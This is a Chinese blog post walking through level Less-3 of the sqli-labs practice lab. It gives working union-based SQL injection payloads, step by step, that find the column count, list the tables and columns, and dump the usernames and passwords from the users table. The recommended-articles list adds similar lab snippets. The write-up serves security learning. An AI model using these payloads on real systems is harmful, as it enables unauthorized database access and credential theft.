SQL注入之sqlilabs:less-3

最新推荐文章于 2024-05-03 16:47:55 发布
最新推荐文章于 2024-05-03 16:47:55 发布
阅读量685 收藏 3
点赞数 1
分类专栏: SQL注入 文章标签: sql less 数据库 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Dmajorcanon/article/details/123058944
版权

题目类型:基于报错的GET单引号字符型注入(带干扰)

测试地址:http://192.168.101.9/sqlilabs/Less-3/?id=1

       访问该网址,页面返回结果如图

0x01 判断注入参数类型

       在URL后添加一个单引号 ,页面报错。根据报错信息判断,此处为字符型注入,且多了“)”干扰闭合。页面返回结果如图

0x02 判断字段数量

        根据错误提示,将URL后单引号改为”')“闭合掉干扰的“('”,然后使用二分法尝试得出字段数为3。页面返回结果如图

Payload -> 192.168.101.9/sqlilabs/Less-3/?id=1') order by 3--+

0x03 判断是否回显及回显位置

       将前面的id改为-1,根据union语句,得出回显位置为2,3。如图所示

       Payload -> 192.168.101.9/sqlilabs/Less-3/?id=-1') union select 1,2,3--+

0x04 查询数据库名称

        根据回显位置,将对应sql语句放置在2和3处。页面返回结果如图

Payload -> 192.168.101.9/sqlilabs/Less-3/?id=-1') union select 1,version(),database()--+

0x05 查询表名

       数据版本为5.0以上,从默认表information_schema中取数。页面返回结果如图

       Payload -> 192.168.101.9/sqlilabs/Less-3/?id=-1') union select 1,version(),group_concat(table_name) from information_schema.tables where table_schema='security'--+

0x06 查询列名

       页面返回结果如图

       Payload -> 192.168.101.9/sqlilabs/Less-3/?id=-1') union select 1,version(),group_concat(column_name) from information_schema.columns where table_name='users'--+

0x07 查询数据

        页面返回结果如图

        Payload -> 192.168.101.9/sqlilabs/Less-3/?id=-1') union select 1,group_concat(username),group_concat(password) from users--+

  Bingo!拿到后台管理员admin

Json文乃
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入sqli-labs第三关(less-3)
s_xcx_ah的博客
06-10 2173
sqli第三关简要步骤
SQL注入漏洞学习之二:SQLI-LABS闯关之Less-3和Less-4
m0_71839248的博客
06-10 723
SQLI-LABS闯关之Less-3和Less-4
SQL注入漏洞解析--less-3
duoba_an的博客
02-22 406
3.这里正常回显,当我们后边加上'时可以看到页面报错信息。可推断sql语句是单引号字符型且有括号,所以我们需要闭合单引号且也要考虑括号。2.这个和之前1.2关提示都是一样,所以我们先输入id数字看一下显示什么。5.这样我们就将括号和单引号给绕过,成功绕过之后我们就能正常操作了。4.当我们知道报错信息后,就可以针对报错信息进行注入。6.后边的操作就是和之前两关的操作一样。1.首先我们打开第三关看一下。
sql-libs less3 答案详解
小白巨白的博客
01-17 544
1、首先对sql的注入语句类型,进行判断,发现当输入数值时,不发生报错,当有单引号时,有错误进行。 sql语句的猜测: select * from 。。 where id=(‘’) 当自己添加‘)进行闭合时,发现整体式子依然成立 说明自己的sql 语句的大致含义正确 2、判断对应的注入点的个数 http://127.0.0.1/Less-3/?id=2’) order by 1、2、3–+ 当出现4的时候,发现错误,所以对应的列数共有3列 3、查找对应的注入点的位置 http://127.0.0.1/Les
sqli-labs第九关
qq_56726035的博客
04-08 649
sqli-labs第九关
sqli-labs:第九关
J_linnb的博客
05-03 931
【代码】sqli-labs:第九关。
sqlilabs过关手册注入天书,过关sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
sqlilabs,里边赠送包含了,sqlilabs过关手册-注入天书,联系sql注入的绝佳靶场
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php,Tomcat+mysql+java(部分关卡需要) Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改...
Microsoft SQL Server 2008技术内幕:T-SQL查询_源代码及附录.zip
09-08
《Microsoft SQL Server 2008技术内幕:T-SQL查询》一书的源代码及附录A内容。确信可下载,真实有效的内容
mysql注入-sqlilabs靶场注入
10-15
sqlilabs靶场全部关卡的详细解析,pdf文档
Microsoft SQL Server 2008技术内幕:T-SQL查询.pdf
08-09
Microsoft SQL Server 2008技术内幕:T-SQL查询
SQL注入less-1
最新发布
m0_62903168的博客
05-03 828
注:phpstudy默认的php版本为7.x,想要成功的搭建靶场,需要把php版本改为5.x。
SQLi-LABS Less-1&&Less-2
m0_64898960的博客
04-09 278
SQLI-LABS
Sqli-labs靶场笔记2(Less-2~4 联合注入)
m0_52233414的博客
04-01 180
sqli-labs的Less2到Less4三道题都可以用联合注入解决,所以放到一起来记录,联合注入的基本思路方法可以看我的上一篇,这里只针对题目来写。
sql注入
leekos的博客,分享web安全相关知识~
12-06 1908
sql提交注入
sqli-labs靶场第九关
gou1791241251的博客
12-26 1497
传入id=1参数进行查看 传入单引号和双引号进行测试闭合方式 传入单引号时页面没反应,试一下双引号 还是没有反应!!!此时应该反应过来,可能页面没有布尔类型状态,只能尝试一下绝招(绝境才能用的招)延时注入 此时发现确实延迟了十秒页面才能正常响应,延时注入是布尔盲注的一种,如果条件正确就沉睡10秒,秒数可以自己自定义。 以下就不演示怎么获取数据库信息了,参考sqli-labs第六关的盲注,把条件换成沉睡10秒即可。 ...
sqli-labs靶场(1-22关)
weixin_51566481的博客
08-16 7359
sqli-labs,sql注入,burpsuit
sqli-labs/Less-2注入
weixin_50339082的博客
06-20 81
sqli-labs/Less-2注入 Sali-lsbs第二关 1、先判断是字符型还是数字型。 http://127.0.0.1/sqli-labs/Less-2/?id=4 127.0.0.1/sqli-labs/Less-2/?id=1 and 1=2 结果一样,说明是数字型。 2、确认字段位数 http://127.0.0.1/sqli-labs/Less-2/?id=3 order by 4 127.0.0.1/sqli-labs/Less-2/?id=3 order by 3 一
sql-labs通关全解---有关二次注入--less24--9
cyynid的博客
01-13 205
二次注入的原理,在第一次进行数据库插入数据的时候,使用了 addslashes 、get_magic_quotes_gpc、mysql_escape_string、mysql_real_escape_string等函数对其中的特殊字符进行了转义,但是addslashes有一个特点就是虽然参数在过滤后会添加 “\” 进行转义,但是“\”并不会插入到数据库中,在写入数据库的时候还是保留了原来的数据。普通注入数据直接进入到 SQL 查询中,而二次注入则是输入数据经处理后存储,取出后,再次进入到 SQL 查询。
sqli-labs-less-7
09-26
sqli-labs less-7是一个web注入实验,它是用来学习SQL注入的。在这个实验中,我们需要使用不同的注入技术来绕过应用程序的安全措施,并从数据库中获取敏感信息。在这个具体的题目中,我们需要使用UNION SELECT语句来实现注入。 根据引用和引用提供的信息,我们可以得出以下步骤: 1. 构造注入语句:在URL参数中使用单引号来闭合原始查询,然后使用UNION SELECT语句来执行额外的SQL查询。在这个例子中,注入语句是?id=-1')) union select 1,user(),database()。 2. 将查询结果导出到文件中:使用INTO OUTFILE语句将注入的查询结果导出到指定的文件路径。在这个例子中,查询的结果将被导出到文件"E:\\phpStudy_64\\phpstudy_pro\\WWW\\sqlilabs\\Less-7\\1.txt"中。 通过这些步骤,我们可以成功执行SQL注入攻击,并将查询结果保存到指定的文件中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值